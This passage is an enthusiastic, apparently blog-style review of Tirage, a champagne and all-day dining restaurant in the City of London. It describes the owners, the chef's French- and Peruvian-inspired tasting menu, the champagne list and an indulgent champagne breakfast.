once said that Champagne is the answer to everything; we’re not going to argue with them, neither will the team behind The City’s latest all-day dining and champagne-drinking concept, Tirage.

Tirage is the dream of Venezuelan couple, Claudia and Elio Machilanda and Michelin-starred restaurateur David Moore. It’s a two floor dining spectacular specialising in Champagne and sparkling wine accompanied by equally glamorous and innovative tasting-plates. Claudia and Elio have very cleverly made Triage feel like you are walking into their (extremely lavish) home to sit amongst friends whilst eating and drinking the food of the Gods…

We recently checked out the 6 course tasting menu, created by their Head Chef Alasdair Fraser (formerly of The Abingdon, Kensington). Each course exhibited the dining teams flare for transforming ordinary dishes into something altogether new with inspiration take from French and Peruvian cuisine. We also sampled a selection of their expansive 120-strong Champagne collection (of which at 15 bottles will be available by the glass every night). Our particular favourite was the Spumante Belcanri NV Rose from Italy which accompanied the Seared Yellowfin Tuna Carpaccio. Please sir, can we have some more?!

Tirage is open for breakfast, lunch and dinner, with two private dining rooms – one sponsored by Perrier Jouët. Take note if you are looking to impress a date the Champagne breakfast that boasts boiled truffle eggs accompanied by house label Perrier Jouët Grand Brut Champagne, followed by Boudin Blanc and Jacquesson Cuvee, and fluffy blueberry pancakes with cinnamon butter and thyme honey will be JUST THE TRICK!
